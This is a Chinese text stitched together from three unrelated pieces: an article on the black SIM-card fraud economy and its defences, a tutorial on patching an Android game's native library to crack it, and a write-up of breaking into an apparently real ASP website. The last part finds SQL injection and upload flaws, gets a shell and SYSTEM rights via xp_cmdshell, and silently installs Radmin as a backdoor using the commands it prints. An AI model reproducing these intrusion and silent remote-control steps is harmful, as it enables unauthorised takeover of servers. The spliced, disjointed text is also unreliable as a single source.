当某个企业做活动奖励时（比如：去年很火的P2P新用户奖励、最近比较火的摩拜、ofo的红包单车），羊毛党就会出动，大批量注册账号获取活动奖励。号商则是大量注册并养各种互联网服务的账号，通过出售养的账号获取收益，如：微信账号、淘宝账号、微博账号、陌陌账号等。这些账号可以用于发广告、做水军、代刷信誉、代刷粉等。由于注册账号需要进行手机短信验证或语音验证，羊毛党/号商就会找到卡商平台去获取手机号来接收验证码。

六. 造成多大的危害

经过和手机黑卡产业内不同的人进行友好交流，猎人君得到了一份还算靠谱的黑卡产业各分工获利数据，由此推算每年手机黑卡产业给企业造成的直接经济损失超过40亿。由于有些数据的可靠性暂无其它渠道可以验证，这份数据还需大家自行判断可靠性。下面就以注册卡（国内物联网卡）为例介绍下一张手机黑卡经过产业各环节后如何价值放大的，并有此推算手机黑卡产业造成的直接经济损失：

卡源卡商

从运营商或代理商处拿卡成本为每张卡6-10元，然后加价转卖给卡商，每张卡收益为5-8元。拿卡成本根据卡的有效期长短波动，例如3个月有效期的卡拿卡成本在6元左右。

卡商

从卡源卡商处拿卡成本为每张卡12-18元，通过接验证码业务，每张卡收入可以做到25-35元左右，收益为10-20元。以每月经手5000张卡的中等规模卡商为例，扣除成本后每月可获利7-8万。

卡商平台

主要成本为平台前期的开发费用和后续的维护费用，通过对每单业务收入分成20%左右获得收益，每张加入平台的卡可以从中获得5元左右的收入。

羊毛党/号商

以微信为例，号商注册一个微信号付给卡商平台的费用为2.5元左右，将微信号养一段时间后出售，满月号（注册满一个月的微信号，下同理类推）、三月号、半年号、一年号分别可以卖到15元、40元、65元、90元左右。号商获利空间丰厚，相应的，由于养号需要大量手机和相应技术，成本和门槛较高。羊毛党的收入则波动较大，在互联网金融、o2o大战、滴滴快的大战、共享单车大战时，羊毛党可谓是日经斗金。大战过后，收入有所下降。

一张手机黑卡最终在羊毛党/号商手中能产生至少100元的收入，按每年4千万张黑卡计算，这个产业每年有40亿以上的产值。有进必有出，这也意味着企业每年因手机黑卡产业攻击造成的直接损失在40亿元以上，间接损失还得另算。

七. 如何防范

运营商掌握着所有手机卡，理论上从运营商入手才能根治手机黑卡问题。

• 物联网卡采用专门号段，停止发放正常号段的物联网卡。
• 加强地区代理商的权限管理，建立实名制审计流程，及时发现内鬼。

作为企业，最快捷的方式则是从专业公司获取经过审计的恶意手机号码，在注册或活动流程中接入审计策略，让企业投入的经费能得到有效利用，并尽量减少因黑卡产业带来的损失。当然，猎人君也提供相关服务，详情请关注公众号：ThreatHunter。

写在最后

正如大草原上狮子周围总有成群的鬣狗，伺机从狮子口中夺取食物，甚至敢于直接攻击狮子。

互联网大公司的周围同样环绕着众多随时掠食的黑灰产从业者，也不乏被黑灰产直接干倒的正规公司。丛林法则在人类的生态系统中不断上演，并将在黑白博弈中一直持续下去，往复循环，不曾更改。

年轻的时候总喜欢分清黑白，站更高才发现世界其实一直如此博弈循环着。我们努力使天平倒向白方，也并非为了能改变局面，只是觉得，不能把世界让给那些不喜欢的人和事。

最近下载了一款游戏『狂暴之刃』

好像是模仿psp的战神:斯巴达之魂 

可惜游戏中的画面还是没有PSP做的好

在网上看到这款游戏的安卓破解版

都是内购破解，无限金币，无限钻石之类的

就想着既然那么多金币钻石

都是用来升级武器之类的

最终也就是升级他的攻击力

于是思考能不能修改它的攻击力呢?

开始着手试下

需要用到的工具如下：

Android killer

IDA pro

arm_asm

010Editor

首先将游戏apk拖入Androidkiller中解包

得到的目录结构，如下图：

随便浏览了一下

发现这是用cocos2d-x游戏引擎制作的

那么多数数据初始化应该就是在lib文件夹里

打开后缀名为.so文件所在的目录

以我的习惯就是先从比较大的文件开始看

因为游戏中初始化的东西多了，逻辑多了

那么它的so文件肯定也大

(个人观点，猜的，我也没使用cocos2d-x开发过游戏)

所以把大文件直接拖入ida中查看此文件

映入眼帘的是这样的一种格式，如下图：

那么一般我都会在Exports栏下搜索关键字

因为Exports栏下都是一些方法的输出

如果游戏中一般要获取钻石、金币之类的

正常的习惯就是getCoin,getDiamond。。。

但是一般我都直接搜Coin,Diamond。。。

因为如果写这个游戏的人他写的是get_Coin，get_Diamond。

或者别的，那我们就搜不到了，因为有下划线或其他的

那么我们直接在此栏下面Ctrl+F搜索attack（攻击）

得到一堆的结果

那么我们怎么判断哪个是真的获取攻击值呢

一般就直接找那种有getXXX什么的

当然可能也有别的情况，这里可能需要点英文基础

不懂的也可以立马百度查，看懂一些关键字

有时候也能大概猜到哪个函数的作用。

看到heroAttack，猜想有可能，点进去看下。

一脸懵逼，其实汇编我也看不太懂，还在学习中。

再继续看以下的方法看到有getWeaponAttack

这个极有可能就是获取攻击力的方法

点进去看看，按空格键，切换到试图模式

一般我看这种方法，都会大致浏览下整个方法

看起来不是很复杂，虽然也看不太懂

但是如果它要输出的话，肯定在最后获取一个数值

最后就是给R0赋值了，那我们就直接给它赋固定值吧

变成不管它上面的逻辑怎么处理

到最后一定是执行我们给的固定值

那么我们找到关键点了，点击此处，然后切换到Hex-view-1查看它的16进制码

复制它的地址及对应的16进制码

先放到txt文件中，然后关闭这个文件

怎么直接给R0赋值？

这里需要用到一个工具arm_asm.exe

这是一个汇编转16进制码的工具，此工具有些是无法转换的，例如。。。

关闭ida之后

我们再使用010Editor打开刚才的那个so文件

可直接把so文件拖入010Editor

因为知道最后获取攻击力的地址了

所以这里直接Ctrl+G跳转到那个地址

改完----保存----再次编译---运行

penta kill

已经破解的游戏和arm_asm工具：

http://pan.baidu.com/s/1miTyFgc 密码：8g4v

总结：

这里主要讲到so文件的修改方式

和利用一些关键词去修改，分享微不足道的思路

如果你有搞怪的方法，还请留言一起探讨下

以上只是用来技术交流

如果您使用该已经破解的游戏用于任何非法用途

均与本作者无关。

以前测试过的一个站点，没什么技术含量只为给自己留个映像和记录。

习惯性的大致浏览了下网站，获取一些基本的网站架构等信息，习惯的手动猜了下备份文件，运气还OK，web2.rar。

有了备份文件，常理来说基本的网站配置信息，数据库配置信息等都可以拿到，如果服务器还开了外连的话就更直接了，根据权限进行相应的提权等，或者拿到后台管理员权限进行上传shell等，利用shell再进行相应的权限提升，方式比较多。一般我自己的习惯是根据备份文件的完整性对代码进行审计，找出Bug，用BUG再进行下一步的利用。有了代码就没必要像黑盒那样的测了，可以直接分析直接命中。（黑白盒结合吧）

在分析代码前，先去浏览下网站的一些主体文件和参数是怎么样的，可以说是踩点吧。

根据提示可以看到，至少主体文件参数传递GET这边是有过滤的，OK，大致知道了一些信息，开始分析代码，网站程序是asp写的。

通篇浏览下备份文件的结构

可以看到应该是一个第三方开发的一套管理系统程序，不是CMS这种。比较简单，分析起来就不那么麻烦。

查看主文件

可以看到，几个主要的包含文件，一般是数据库文件，过滤文件，自定义函数文件等。打开包含文件 DbConn.Inc 进行分析

可以看到 Invalid 变量过滤的一些关键字，同时 Set Collection=Request.QueryString 可以很明显的看到，只是过滤了Get方式的参数，那么这里就会有安全问题了，sql注入。如果以Request方式接收参数，那么post，cookie都可以进行注入，没有过滤。

带着这个信息点，我们开始分析主要文件参数的接收方式，看看有没有Request的。

infobody.asp 中 StrSQL="Select * From Web_Info Where ID="&Int(Request.QueryString("ID"))

infobody.asp 里 StrSQL="Select * From Web_Info Where ID="&Int(Request.QueryString("ID"))

其中 Int(Request.QueryString("ID") 不仅被过滤了而且还指定了数据类型为int ，那么pass掉了

infolist_01.asp 也一样

来到 Findlist.asp 这里 ，发现 KeyWords =Request("KeyWords") 中KeyWords参数是以Request方式接收，那么post方式进行传参也是可以被接收到的，没过滤直接带入数据库，造成了SQL注入，OK这边就发现了一出注入，先记下。

直接来到后台登入验证这 CheckLogin.asp 里

User_ID = Request.Form ("User_ID")

User_Pass = MD5(Request.Form ("User_Pass"))

VerifyCode = Trim(Request.Form ("VerifyCode"))

帐号密码都是 Request.Form 方式接收（POST），过滤文件只过滤 Request.QueryString 参数，这里又是一处sql注入。

有了注入漏洞，那么先去测试下注入，根据数据库权限再进行下一步深入。

这边可以注入，还是DBA权限，先不急着cmd执行，或者写shell，先拿到管理员进后台看看后台有没有上传漏洞，当然还是分析代码为主，黑白结合吧。拿下还是不拿下已经不重要了，都是套路问题，主要是研究，不要老是按照常规的方式或者单一的方式去测试或者说日站，时间长了思维就会僵硬。

后台比较简陋，所有上传点都是同一个文件处理的，还有webeditor编辑器，其实切入口很多，都可以玩。不过这个webeditor已经写死了，就不测试了。重点测这个上传点

找到了文件 Info_AmendSave.asp 进行分下

可以看到包含了一个 Upload.asp 处理文件，一个截断问题

到这里shell基本拿到了（这里asp的权限非常低，后来上了aspx的），当然前面也说了方式是很多的，比如注入直接写shell，cmd命令add管理员，外链数据库xp_cmdshell什么的都可以玩，溢出拿system，等等

这边就测试下radmin静默部署拿下server吧，也算远控。3.0的，dos下无提示安装

先把前2个文件上传到服务器，（这边我用了sa的帐号特性，administrator，或者system权限，xp_cmdshell执行的命令，当然溢出也可以）

OK，上传完毕。

这边遇到个麻烦，shell脚本问题切不了其它目录，只能在system32目录呆着。。。不过没事权限是system的

直接copy文件 到system32目录

copy完成，开始执行命令

依次：

r_server /port:12345 /pass:admin888 /save /silence

r_server /install /silence

sc start r_server

（说明下，port是待会要连接服务器的端口，pass就很明显了连接密码，第二条命令是安装，第三跳，启动~！！）

前两条命令是不显示任何字符的，第三条会显示状态。这里可以看到已经启动，OK直接去控制端连接下试试

基本已经拿到控制，方式还有很多，add管理员，端口转发连接，都是OK的！没什么技术含量，只是做个笔记。